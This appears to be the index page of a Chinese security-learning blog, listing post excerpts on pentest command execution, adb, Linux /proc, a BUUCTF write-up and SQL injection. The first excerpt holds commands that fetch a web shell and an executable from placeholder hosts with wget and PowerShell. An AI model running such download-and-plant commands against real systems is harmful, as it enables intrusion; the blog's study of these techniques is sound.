windows命令执行上传恶意文件 wget1wget http://xx.x.x.x:8080/shell.txt -O x.php powershell命令执行权限时 1powershell -Command "$client = new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x:8000/1.exe', &# 2021-12-07 Pentest
adb学习记录 adb简介ADB 即Android Debug Bridge(安卓调试桥),是一种可以用来操作手机设备或模拟器的命令行。存在于sdk/platform-tools目录下,夜神模拟器存在于/bin目录下。 查看当前连接设备: E:\Nox\bin>adb.exe devicesList of devices attached127.0.0.1:62028 device 常用adb操作1、把 2021-09-11 Android
Linux的/proc详解 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其他常见的文件系统不同的是/proc是一种伪文件系统(即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 基于/proc文件系统如上所述的特殊性,其内的文件也常被称作虚拟文 2021-08-25 Linux
BUUCTF答题记录 0x01 Basic0x01 linux labs通过ssh连接buu内网主机 1ssh -p 25815 [email protected] -p指定端口,root为用户名,@后为ip地址 第一次连接需要输入yes,然后 12ls ../cat ../flag.txt 0x02 BUU LFI COURSE 1题目源码 1234567891011<?php/** * Create 2021-05-04 ctf
sql-inject-summary SQL注入总结0x01 SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了SQL注入。攻击者可通过构造不同的SQL语句来实现对数据库的任意操作。 0x02 SQL注入的分类按变量类型分:数字型和字符型 按HTTP提交方式分:POST注入、GET注入和Cookie注入 按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入 按数据库类型分: 12sql:o 2021-05-03 Pentest
mysql8-inject-learning 利用mysql8新特性进行SQL注入0x01 MySQL8语法新特性1、TABLE Statement作用:列出表中全部内容 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] TABLE是mysql 8.0.19中引入的DML语句,它返回命名表的行和列,类似于SELECT。 支持UNION联合查询、ORDE 2021-05-01 Pentest